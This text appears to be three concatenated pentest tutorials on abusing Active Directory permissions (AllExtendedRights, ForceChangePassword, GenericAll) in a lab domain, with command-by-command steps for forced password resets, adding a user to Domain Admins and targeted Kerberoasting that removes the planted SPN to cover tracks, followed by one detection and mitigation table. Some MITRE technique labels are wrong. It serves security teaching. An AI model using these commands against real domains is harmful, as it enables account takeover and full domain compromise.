Abusing AD-DACL: AllExtendedRights

In this post, we will explore the exploitation of Discretionary Access Control Lists (DACL) using the AllExtendedRights permission in Active Directory environments. With this permission, attackers can escalate privileges, gain persistent access, and potentially take control of critical directory resources, making it a powerful foothold in compromising a domain.

The lab setup necessary to simulate these attacks is outlined, with methods mapped to the MITRE ATT&CK framework to clarify the associated techniques and tactics. Detection mechanisms for identifying suspicious activities linked to AllExtendedRights attacks are also covered, alongside actionable recommendations for mitigating these vulnerabilities. This overview equips security professionals with critical insights to recognize and defend against these prevalent threats.

Table of Contents

Abusing AD-DACL- AllExtendedRights

AllExtendedRights Permission

Prerequisites

Lab Setup – User Owns AllExtendedRights Permission

Exploitation – User Owns AllExtendedRights Permission

Bloodhound - Hunting for Weak Permission

Method for Exploitation – Change Password (T1110.001)

  • Linux Net RPC – Samba
  • Linux Net RPC – Rpcclient
  • Linux Net RPC – BloodAD
  • Windows PowerShell - Powerview

Detection & Mitigation

 

AllExtendedRights Permission

Extended rights are special rights granted on objects which allow reading of privileged attributes, as well as performing special actions.

This permission allows for resetting passwords on User objects and for crafting a Resource-Based Constrained Delegation (RBCD) attack for Computer objects

If a domain object with AllExtendedRights permissions on the domain object itself is compromised, that domain object will have both the DS-Replication-Get-Changes and DS-Replication-Get-Changes-All privilege. Both rights allow a principal to replicate objects from the Domain (DCSync).

Prerequisites

  • Windows Server 2019 as Active Directory
  • Kali Linux
  • Tools: Bloodhound, Net RPC, Powerview, BloodyAD
  • Windows 10/11 – As Client

Lab Setup – User Owns AllExtendedRights Permission

Here, in this lab setup, we will create two users’ Kavish and Geet, and will assign Geet user “AllExtendedRights” permission for Kavish User.

  1. Create the AD Environment:

To simulate an Active Directory environment, you will need a Windows Server as a Domain Controller (DC) and a client machine (Windows or Linux) where you can run enumeration and exploitation tools.

  • Domain Controller:
    • Install Windows Server (2016 or 2019 recommended).
    • Promote it to a Domain Controller by adding the Active Directory Domain Services role.
    • Set up the domain (e.g., ignite.local).
  • User Accounts:
    • Create two AD user accounts named Kavish and Geet.

net user kavish Password@1 /add /domain

net user geet Password@1 /add /domain



 

2.       Assign the "AllExtendedRights" Privilege to Geet for Kavish User:

Once your AD environment is set up, you need to assign the "AllExtendedRights" privilege to Geet for Kavish user.

  • Steps:
    1. Open Active Directory Users and Computers (ADUC) on the Domain Controller.
    2. Enable the Advanced Features view by clicking on View > Advanced Features.
    3. Locate User Kavish in the Users container.
    4. Right-click on Kavish User and go to Properties.


 

    1. Go to the Security tab, and click on Add button


    1. In the “Enter the object name to select” box, type Geet and click Check Names and click on OK.


    1. Select Geet user and click on advanced option.


    1. In the Advanced security settings box, double-click on Geet user’s permission entry.


    1. In the Permissions section, check the box for All Extended Rights permission.
    2. Apply the settings.


 

At this point, Geet now has AllExtendedRights permission for Kavish user, meaning Geet can change the password of Kavish user’s account without knowing their current password

 

Exploitation

Bloodhound - Hunting for Weak Permission

Use BloodHound to Confirm Privileges: You can use BloodHound to verify that Geet has the AllExtendedRights permission for Kavish user.

bloodhound-python -u geet -p Password@1 -ns 192.168.1.8 -d ignite.local -c All



 

From the graphical representation of Bloodhound, the tester would like to identify the outbound object control for selected user where the first degree of object control value is equal to 1.



 

Thus, it has shown that Geet User has AllExtendedRights privilege for Kavish user.



Method for Exploitation – Change Password (T1110.001)

The tester can abuse this permission by changing password for Kavish user without knowing their current password.

  1. Linux Net RPC – Samba

It can be achieved from UNIX-like system with net, a tool for the administration of samba and cifs/smb clients.

net rpc password kavish 'Password@987' -U ignite.local/geet%'Password@1' -S 192.168.1.8



2.       Linux Bloody AD

Alternatively, it can be achieved using bloodyAD

bloodyAD --host "192.168.1.8" -d "ignite.local" -u "geet" -p "Password@1" set password "kavish" "Password@987"



3.       Linux Net RPC – Rpcclient

The rpcclient can also be used on UNIX-like systems when the package samba-common-bin is missing.

rpcclient -U ignite.local/geet 192.168.1.8

setuserinfo kavish 23 Ignite@987



4.       Windows PowerShell - Powerview

The attacker can change the password of the user using PowerView module. This can be achieved with Set-DomainUserPassword cmdlet.

powershell -ep bypass

Import-Module .\PowerView.ps1

$NewPassword = ConvertTo-SecureString 'Password1234' -AsPlainText -Force

Set-DomainUserPassword -Identity 'kavish' -AccountPassword $NewPassword



Or the above can be achieved in verbose mode as well

Set-DomainUserPassword -Identity 'kavish' -Verbose



 

Detection & Mitigation



Abusing AD-DACL: ForceChangePassword

 In this post, we explore the exploitation of Discretionary Access Control Lists (DACL) using the ForcePasswordChange permission in Active Directory environments. This permission is especially dangerous for privileged accounts, as it enables lateral movement and unauthorized access across systems by impersonating the compromised account.

The lab setup necessary to simulate these attacks is outlined, with methods mapped to the MITRE ATT&CK framework to clarify the associated techniques and tactics. Detection mechanisms for identifying suspicious activities linked to ForcePasswordChange attacks are also covered, alongside actionable recommendations for mitigating these vulnerabilities. This overview equips security professionals with critical insights to recognize and defend against these prevalent threats.

Table of Contents

Abusing AD-DACL- ForceChangePassword

ForceChangePassword Right

Prerequisites

Lab Setup – User Owns ForceChangePassword Rights

Exploitation – User Owns ForceChangePassword Rights

Bloodhound - Hunting for Weak Permission

Method for Exploitation – Change Password (T1110.001)

  • Linux Net RPC – Samba
  • Linux Net RPC – Rpcclient
  • Linux Net RPC – BloodAD
  • Windows PowerShell - Powerview

Detection & Mitigation

 

ForceChangePassword Right

This permission provides right to change the password of a user account without knowing their current password.

This abuse can be carried out when controlling an object that has a GenericAllAllExtendedRights or User-Force-Change-Password over the target user.

Prerequisites

  • Windows Server 2019 as Active Directory
  • Kali Linux
  • Tools: Bloodhound, Net RPC, Powerview, BloodyAD
  • Windows 10/11 – As Client

Lab Setup – User Owns ForceChangePassword Rights

Here, in this lab setup, we will create two users’ Raj and Aarti, and will assign Raj user “Reset Password” rights for Aarti User.

  1. Create the AD Environment:

To simulate an Active Directory environment, you will need a Windows Server as a Domain Controller (DC) and a client machine (Windows or Linux) where you can run enumeration and exploitation tools.

  • Domain Controller:
    • Install Windows Server (2016 or 2019 recommended).
    • Promote it to a Domain Controller by adding the Active Directory Domain Services role.
    • Set up the domain (e.g., ignite.local).
  • User Accounts:
    • Create two AD user accounts named Raj and Aarti.

net user raj Password@1 /add /domain

net user aarti Password@1 /add /domain



 

2.       Assign the "ForceChangePassword" Privilege to Raj for Aarti User:

Once your AD environment is set up, you need to assign the "ForceChangePassword" rights to Raj for Aarti user.

  • Steps:
    1. Open Active Directory Users and Computers (ADUC) on the Domain Controller.
    2. Enable the Advanced Features view by clicking on View > Advanced Features.


    1. Locate User Aarti in the Users container.
    2. Right-click on Aarti User and go to Properties.


    1. Go to the Security tab


 

    1. And click on Add button


 

    1. In the “Enter the object name to select” box, type Raj and click Check Names.


    1. In the Permissions section, check the box for Reset Password permission.
    2. Apply the settings.


At this point, Raj now has Reset Password rights for Aarti user, meaning Raj can change the password of Aarti user’s account without knowing their current password

 

 

Exploitation

Bloodhound - Hunting for Weak Permission

Use BloodHound to Confirm Privileges: You can use BloodHound to verify that Raj has the ForceChangePassword rights for Aarti user.

bloodhound-python -u raj -p Password@1 -ns 192.168.1.8 -d ignite.local -c All



From the graphical representation of Bloodhound, the tester would like to identify the outbound object control for selected user where the first degree of object control value is equal to 1.



Thus, it has shown that Raj User has ForceChangePassword privilege for Aarti user.



 

Method for Exploitation – Change Password (T1110.001)

The tester can abuse this permission by changing password for Aarti user without knowing their current password.

  1. Linux Net RPC – Samba

It can be achieved from UNIX-like system with net, a tool for the administration of samba and cifs/smb clients.

net rpc password aarti 'Password@987' -U ignite.local/raj%'Password@1' -S 192.168.1.8



2.       Linux Net RPC – Rpcclient

The rpcclient can also be used on UNIX-like systems when the package samba-common-bin is missing.

rpcclient -U ignite.local/raj 192.168.1.8

setuserinfo aarti 23 Password@987



3.       Linux Bloody AD

Alternatively, it can be achieved using bloodyAD

bloodyAD --host "192.168.1.8" -d "ignite.local" -u "raj" -p "Password@1" set password "aarti" "Password@987"



4.       Windows PowerShell - Powerview

The attacker can change the password of the user using PowerView module. This can be achieved with Set-DomainUserPassword cmdlet.

powershell -ep bypass

Import-Module .\PowerView.ps1

$NewPassword = ConvertTo-SecureString 'Password1234' -AsPlainText -Force

Set-DomainUserPassword -Identity 'aarti' -AccountPassword $NewPassword




 

Detection & Mitigation





Abusing AD-DACL : Generic ALL Permissions

 

In this post, we explore the exploitation of Discretionary Access Control Lists (DACL) using the Generic ALL permission in Active Directory environments. This permission provides unrestricted access to user attributes, enabling various attack vectors, such as Kerberoasting, password resets, and account manipulation.

We will detail the lab setup needed to simulate these attacks and map these methods to the MITRE ATT&CK framework to understand the techniques and tactics involved. Additionally, we will discuss detection mechanisms to identify suspicious activities linked to Generic ALL attacks and provide actionable recommendations to mitigate these vulnerabilities. This overview aims to equip security professionals with the knowledge to recognize and defend against these prevalent threats.

Table of Contents

Abusing AD-DACL- Generic ALL Permissions

Key Concepts of DACL

Generic ALL Right

Prerequisites

Lab Setup – User Owns Generic ALL Right For Domain Admin Group

Exploitation Phase I - User Own Generic All Right for Group

Bloodhound -Hunting for Weak Permission

Method for Exploitation - Account Manipulation (T1098)

·       Linux Net RPC – Samba

·       Linux Bloody AD

·       Windows Net command

Exploitation Phase II - User own generic Right for another user

Bloodhound -Hunting for Weak Permission

Multiple Method for Exploitation

·       Kerberoasting

o   Linux Python Script - TargetedKerberoast

o   Windows PowerShell Script-Powerview

·       Change Password

o   Linux Net RPC – Samba

o   Linux Net RPC – BloodAD

o   Linux Net RPC –Rpcclient

o   Windows Net Utility

o   Windows PowerShell -Powerview

o   Windows PowerShell

Detection & Mitigation

 

Active Directory DACL

In Active Directory (AD), a DACL (Discretionary Access Control List) is a component of an object's security descriptor that specifies which users or groups are allowed (or denied) access to the object and what actions they are permitted to perform. It essentially controls who can do what to an object, such as a user account, computer, group, or any other directory object.

Key Concepts of DACL:

  1. Access Control Entries (ACEs):
    A DACL is made up of multiple ACEs. Each ACE defines the specific access rights for a user or group and specifies what kind of access (read, write, execute, etc.) is allowed or denied.
  2. Permissions:
    Permissions define the specific actions a user or group can perform on an object. These permissions can be basic, like reading or writing to the object, or more complex, like modifying permissions or taking ownership.
  3. Rights:
    Rights are a higher-level abstraction of permissions. In Active Directory, common DACL rights include:
    • GenericAll: Grants full control over an object (e.g., modify properties, reset passwords, etc.).
    • GenericWrite: Allows modification of some object properties.
    • WriteDACL: Lets the user modify the DACL itself, potentially escalating privileges.
    • WriteOwner: Grants the ability to take ownership of the object, allowing further privilege modification.
    • ReadProperty: Allows reading of object properties (e.g., attributes in a user object).
    • AllExtendedRights: Grants special rights for advanced operations, like resetting passwords or enabling delegation.
    • Delete: Grants the ability to delete the object.
    • ReadDACL: Allows reading the object's access permissions without being able to change them.
    • ForceChangePassword: Allows forcing a user to change their password without knowing the current one.
  4. Inheritance:
    DACLs can be inherited from parent objects, meaning permissions on a container (like an Organizational Unit) can be passed down to child objects. This simplifies management but can also lead to unintended permissions if not carefully configured.
  5. Security Descriptor:
    The DACL is part of a larger security descriptor that also includes the Owner (the entity that has ownership of the object and can change its permissions) and an optional SACL (System Access Control List) that controls auditing.

 

Weak DACLs can lead to unauthorized access or privilege escalation if not properly configured.

 

Generic ALL Right

In Active Directory, permissions and privileges define what actions an entity (user, group, or computer) can perform on another object. The "Generic ALL" privilege is one of the most powerful in AD because it grants complete control over the target object. This means that the user or group with this privilege can:

  • Modify any attribute of the object
  • Reset passwords
  • Add or remove members from groups
  • Delegate further control to other users
  • Delete the object altogether

Because of its extensive reach, an attacker who gains "Generic ALL" privileges on sensitive objects (like privileged groups or service accounts) can essentially gain domain dominance.

Exploiting "Generic ALL" Privilege

Here's how an attacker can leverage the "Generic ALL" privilege to compromise Active Directory:

  1. Identifying Targets with "Generic ALL" Privilege
    The first step is to identify objects where the attacker has this privilege. This can be done using tools like BloodHound or PowerView, which map out Active Directory and show privilege relationships. Once identified, the attacker can choose their target based on the potential impact (e.g., a Domain Admin account).
  2. Resetting Passwords
    If the "Generic ALL" privilege is applied to a user account, the attacker can reset the account's password. This is particularly devastating if the account is for a privileged user, such as a Domain Administrator. After resetting the password, the attacker can log in as that user and gain full control over the domain.
  3. Modifying Group Membership
    If the "Generic ALL" privilege is applied to a group, the attacker can add themselves to a high-privilege group, like Domain Admins or Enterprise Admins. This grants them the privileges of those groups, effectively giving them control over the entire domain.
  4. Abusing Delegated Control
    With the "Generic ALL" privilege, the attacker can delegate control of the target object to another user or group. This allows them to grant privileges to themselves or other malicious users without raising suspicion immediately.
  5. Deleting or Modifying Objects
    In extreme cases, an attacker with "Generic ALL" can delete critical objects, such as service accounts or privileged users, causing operational disruptions or creating avenues for further exploitation.

Prerequisites

·       Windows Server 2019 as Active Directory

·       Kali Linux

·       Tools: Bloodhound, Net RPC, Powerview, Rubeus,

·       Windows 10/11 – As Client

Lab Setup – User Owns Generic ALL Right For Domain Admin Group

1. Create the AD Environment:

To simulate an Active Directory environment, you’ll need a Windows Server as a Domain Controller (DC) and a client machine (Windows or Linux) where you can run enumeration and exploitation tools.

  • Domain Controller:
    • Install Windows Server (2016 or 2019 recommended).
    • Promote it to a Domain Controller by adding the Active Directory Domain Services role.
    • Set up the domain (e.g., ignite.local).
  • User Accounts:
    • Create a standard user account named Komal.

Command: net user komal Password@1 /add /domain



2. Assign the "Generic ALL" Privilege to Komal:

Once your AD environment is set up, you need to assign the "Generic ALL" right to Komal for the Domain Admins group.

  • Steps:
    1. Open Active Directory Users and Computers (ADUC) on the Domain Controller.
    2. Enable the Advanced Features view by clicking on View > Advanced Features.
    3. Locate the Domain Admins group in the Users container.
    4. Right-click Domain Admins and go to Properties.

 



    1. Go to the Security tab and click Advanced.

 



    1. Click Add, then select the Komal user.


 

    1. In the Permissions Entry window, select This object and all descendant objects.
    2. In the Permissions section, check the box for Full Control or specifically check "Generic ALL" if available.
    3. Apply the settings.

At this point, Komal now has Generic ALL rights over the Domain Admins group, meaning they can modify attributes, reset passwords, or even add themselves to the group.

 

 



Exploitation Phase I - User Own Generic All Right for Group

Compromised User: Komal

Target Account: Domain Admin Group

Now that the lab is set up, let’s walk through how an attacker (acting as Komal) can abuse the Generic ALL privilege.

Assuming the Red Teamer knows the credential for Komal Users as a Standard Domain Users and would like to enumerate the other Domain users & Admin members with the help of “net-rpc” Samba command line Utility.

Command: net prc user -U ignite.local/komal%'Password@1' -S 192.168.1.8

Command: net rpc group members "Domain Admins" -U ignite.local/komal%'Password@1' -S 192.168.1.8

After executing above command its has been concluded that the Administrator users is only the single member of the Admin group. Unfortunately, the tester is doesn’t know the credentials of administrator.



Bloodhound -Hunting for Weak Permission

Use BloodHound to Confirm Privileges: You can use BloodHound to verify that Komal has the Generic ALL right on the Domain Admins group.

Command: bloodhound-python -u komal -p Password@1 -ns 192.168.1.8 -d ignite.local -c All



From the graphical representation of Bloodhound, the tester would like to identify the outbound object control for selected user where the first degree of object control value is equal to 1.



 

Thus it has shown the Komal User has Generic ALL privilege to Domain Admin group and provided steps for exploitation to be proceed.



Method for Exploitation - Account Manipulation (T1098)

1.     Linux Net RPC – Samba

The tester can abuse this permission by Komal User into Domain Admin group and list the domain admin members to ensure that Komal Users becomes Domain Admin.

Command: net rpc group addmem "Domain Admins" "komal" -U ignite.local/komal%'Password@1' -S 192.168.1.8

 



2.     Linux Bloody AD

Command: bloodyAD --host "192.168.1.8" -d "ignite.local" -u "komal" -p "Password@1" add groupMember "Domain Admins" "komal"



thus from user property we can see komal user has become the member of domain admin.



 

3.     Windows Net command

Command: net group “domain admins” komal /add /domain



 

Exploitation Phase II - User own generic Right for another user

 

To set up a lab environment where the user Nishant has Generic ALL rights over the user Vipin, you'll need to follow several steps. This process involves configuring Active Directory (AD) permissions so that Nishant can manipulate attributes of the Vipin account.

Step 1: Create Two AD user accounts

Command: net user vipin Password@1 /add /domain

Command: net user vipin Password@1 /add /domain

 



Step 2: Assign Generic ALL Permissions

    1. Open Active Directory Users and Computers.
    2. Navigate to the Vipin user account.
    3. Right-click on Vipin, select Properties.

 


 


    1. Go to the Security tab.
    2. Click Advanced and then Add.

 



    1. In the "Enter the object name to select" box, type Nishant and click Check Names.
    2. After adding Nishant, set the permissions:
      • Check Generic All in the permissions list (you may need to select Full Control to encompass all rights).

 



    1. Ensure Applies to is set to This object only.

 



 

Bloodhound -Hunting for Weak Permission

Hunting for First Degree objection Control for Nishant Users as did in previous steps

Command: bloodhound-python -u nishant -p Password@1 -ns 192.168.1.8 -d ignite.local -c All



From the graph it can be observed that the nishant user owns generic all privilege on vipin user



Moreover, Bloodhound also helps the pentest to define the possible attack from the user account nishant, this user can perform domain attack such as keroasting and shadow credentials



 



Multiple Method for Exploitation

1.     T1558.003 – Kerberoasting

1.1              Linux Python Script - TargetedKerberoast

 

Compromised User: Nishant:Password@123

Target User: Vipin

Kerberoasting is an attack technique that targets service accounts in Active Directory environments, where an attacker with Generic ALL permissions on a user can exploit the ability to request service tickets (TGS). By requesting TGS for service accounts, the attacker can obtain encrypted tickets that include the service account’s password hash. Since these tickets can be extracted and then offline cracked, the attacker can potentially gain access to the service account’s credentials. The attack leverages the fact that service accounts typically have elevated privileges, allowing the attacker to escalate their own access within the network once the password is cracked. This exploitation is particularly effective in environments where weak or easily guessable passwords are used for service accounts.

Download: git clone https://github.com/ShutdownRepo/targetedKerberoast.git



Command: ./targetedKerberoast.py --dc-ip '192.168.1.8' -v -d 'ignite.local' -u 'nishant' -p 'Password@1'

As we have seen during the lab setup that vipin user was add domain user account which does not have any associated spn. The Python is script has modify the attribute of vipin user to set the SPN name and then dump Krbtgs hash that can be brute force offline. Moreover the script perform clear track step by removing the spn well live from user attribute.

This type of attack ideally best when the attacker is not willing to change the password for target user <Vipin in our case> even generic all privilege is enabled for compromised user. Yes this step is less noisy then the changing the password of any user.

 



Further, with the help of John the Ripper end the dictionary such as Rock You can help the attacker to brute force the weak password.

 



 

1.2            Windows PowerShell Script-Powerview

To perform Kerberoasting using PowerView on a Windows machine, you can leverage PowerView’s ability to enumerate Active Directory service accounts that have Service Principal Names (SPNs). These SPNs can be requested to obtain service tickets (TGS), which can then be cracked offline to reveal the service account’s credentials. Here’s a brief overview of the steps:

Make sur that the target account has no SPN and then Set the SPN to obtain the KerbTGS hash

Command: Get-DomainUser 'vipin' | Select serviceprincipalname

Command: Set-DomainObject -Identity 'vipin' -Set @{serviceprincipalname='nonexistent/hackingarticles'}

Command:$User = Get-DomainUser 'vipin'

Command:$User | Get-DomainSPNTicket | f1

 



 

Cracking TGS hash using Rockyou.txt with the help of Hashcat Tool.

 



2.     T1110.001 – Change Password

2.1              Linux Net RPC – Samba

 

Command: net rpc password vipin 'Password@987' -U ignite.local/nishant%'Password@1' -S 192.168.1.8



2.2              Linux Net RPC – BloodAD

 

Command: bloodyAD --host "192.168.1.8" -d "ignite.local" -u "nishant" -p "Password@1" set password "vipin" "Password@9876"



2.3              Linux Net RPC –Rpcclient

Command: rpcclient -U ignite.local/nishant 192.168.1.8

Command: setuserinfo vipin 23 Ignite@987



2.4              Windows Net Utility

Command: net user Vipin Password@1234 /domain



 

2.5              Windows PowerShell -Powerview

Command: $SecPassword = ConvertTo-SecureString 'Password@987' -AsPlainText -Force

Command: $Cred = New-Object System.Management.Automation.PSCredential('ignite.local\vipin', $SecPassword)

 



 

2.6              Windows PowerShell

Command: $NewPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force

Command: Set-DomainUserPassword -Identity 'vipin' -AccountPassword $NewPassword

 

 



 

 

Detection & Mitigation

 

Attack

MITRE ATT&CK Technique

Description

Detection

Mitigation

Reset Password

T1110.001 – Password Cracking

Attackers with Generic ALL permissions can reset the target user’s password to gain full access to their account.

- Monitor for unusual password resets by non-admin users.

 

- Detect anomalies in password change activities.

 

- Check audit logs for unusual access or password reset events.

- Enforce least privilege access control.

- Limit the use of powerful permissions like Generic ALL.

 

- Require multi-factor authentication (MFA) for password resets.

Account Manipulation

T1098 – Account Manipulation

Attackers with Generic ALL can modify account attributes (add groups, change privileges) or even disable auditing.

- Monitor for account changes, including group memberships and privileges.

 

- Log changes to critical accounts (e.g., admin, domain admin accounts).

- Use privileged access workstations (PAWs) for administrative tasks.

 

- Restrict sensitive permissions like Generic ALL.

 

- Implement Role-Based Access Control (RBAC).

Kerberoasting

T1558.003 – Kerberoasting

Attackers with access can request service tickets for service accounts with SPNs, allowing offline cracking of the ticket for credential extraction.

- Monitor for excessive Kerberos ticket-granting service (TGS) requests.

 

- Detect abnormal account ticket requests, especially for accounts with SPNs.

 

- Enable Kerberos logging.

- Use strong, complex passwords for service accounts.

- Rotate service account passwords regularly.

 

- Disable unnecessary SPNs.

 

- Monitor TGS requests for anomalies.

Setting SPNs

T1207 – Service Principal Discovery

Attackers can add an SPN to an account, allowing them to later perform attacks like Kerberoasting to retrieve service account TGS tickets.

- Monitor changes to SPN attributes using LDAP queries or PowerShell.

 

- Detect modifications to AD attributes related to SPNs.

 

- Monitor account changes using event logs.

- Limit the ability to modify SPNs to authorized users only.

 

- Enforce MFA for service accounts.

 

- Ensure strong passwords for accounts with SPNs.

 

- Periodically audit SPNs.

Shadow Credentials

T1208 – Credential Injection (Abusing msDS-KeyCredentialLink)

Attackers use the msDS-KeyCredentialLink attribute to add alternate credentials (keys or certificates) for an account, allowing persistence and authentication without knowing the user’s password.

- Monitor changes to the msDS-KeyCredentialLink attribute.

 

- Audit AD logs for unusual certificate and key additions.

 

- Use LDAP queries to detect attribute modifications.

- Limit access to modify msDS-KeyCredentialLink to authorized accounts.

 

- Regularly audit msDS-KeyCredentialLink attributes.

 

- Use strong key/certificate management practices

Pass-the-Ticket (PTT)

T1550.003 – Pass the Ticket

Attackers use captured Kerberos tickets (TGT/TGS) to authenticate to services without knowing the password.

- Monitor for unusual Kerberos ticket-granting ticket (TGT) or service ticket (TGS) usage.

 

- Detect ticket reuse across different systems

 

- Enable and monitor Kerberos logging.

- Use Kerberos Armoring (FAST) to encrypt Kerberos tickets.

 

- Enforce ticket expiration and short lifetimes for TGT/TGS.

 

- Enforce ticket expiration and short lifetimes for TGT/TGS.

- Implement MFA for critical resources.

Pass-the-Hash (PTH)

T1550.002 – Pass the Hash

Attackers use captured NTLM hash to authenticate without knowing the actual password, often used for lateral movement or privilege escalation.

- Monitor NTLM authentication attempts and detect anomalies (especially from low-privilege to high-privilege accounts).

 

- Analyze logins that skip standard authentication steps.

- Disable NTLM where possible.

 

 

- Enforce SMB signing and NTLMv2.

 

- Use Local Administrator Password Solution (LAPS) to manage local administrator credentials.

 

- Implement MFA.

Adding Users to Domain Admins

T1098.002 – Account Manipulation: Domain Account

Attackers with Generic ALL can add themselves or another account to the Domain Admins group, granting full control over the domain.

- Monitor changes to group memberships, especially sensitive groups like Domain Admins.

 

- Enable event logging for group changes in Active Directory.

- Limit access to modify group memberships.

 

- Enable just-in-time (JIT) administration for critical roles

 

- Use MFA for high-privilege accounts and role modifications.